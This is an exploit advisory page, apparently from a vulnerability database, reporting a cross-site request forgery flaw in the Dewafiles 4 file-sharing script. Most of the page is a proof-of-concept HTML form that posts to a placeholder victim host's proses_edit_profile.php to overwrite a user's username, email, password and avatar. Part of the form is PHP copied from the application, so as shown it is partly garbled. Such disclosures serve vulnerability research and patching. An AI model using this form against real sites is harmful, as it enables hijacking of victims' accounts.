Dewafiles 4 Cross Site Request Forgery

2013.06.09
Credit: vir0e5
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Dewafiles Versi 4 - CSRF Vulnerabilities # Author Exploit : vir0e5 # Date : 08-06-2012 # Site : http://blog.megasoft-id.com/ # Vendor : http://blog.megasoft-id.com/article/dewafiles/ # Version : Dewafiles versi 4 # Software Link: http://blog.megasoft-id.com/article/dewafiles/ # Tested on : Window and Linux # CVE : [not yet] [ Vulnerable File ] ~ proses_edit_profile.php [ Exploit ] <form enctype="multipart/form-data" action="http://korban.com/proses_edit_profile.php" method="POST"> <input type="hidden" name="id" value="<?PHP echo $id; ?>"> <p><me>Username</me></br> <input type="text" style="width:100%" required name='username' value="<?PHP echo $_SESSION['my_name']; ?>"> <p><me>Email</me></br> <input type="text" style="width:100%" required name='email' value="<?PHP echo $email; ?>"> <p><me>Password</me></br> <input type="password" style="width:100%" required name='pswd' value="<?PHP echo $pswd; ?>"> <p><me>Gender</me></br> <select style="width:100%" required name="gender"> <option><?PHP echo $gender; ?></option> <option>Male</option> <option>Female</option> </select> <p><me>Your Avatar</me></br> <img src="<?PHP echo $photo ?>" width="60" height="60"></br> Default Avatar : "<?PHP echo $photo; ?>"</br> Change => <input style="width:200px" type="file" name="photo"> <p> <input type="submit" class="button" value="Save"> </form> ************************************************************* [+] Greetz :INDONESIAN SECURITY - TASIK CYBER - INDONESIAN CODER - EXPLOIT-ID;

References:

http://blog.megasoft-id.com/article/dewafiles/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top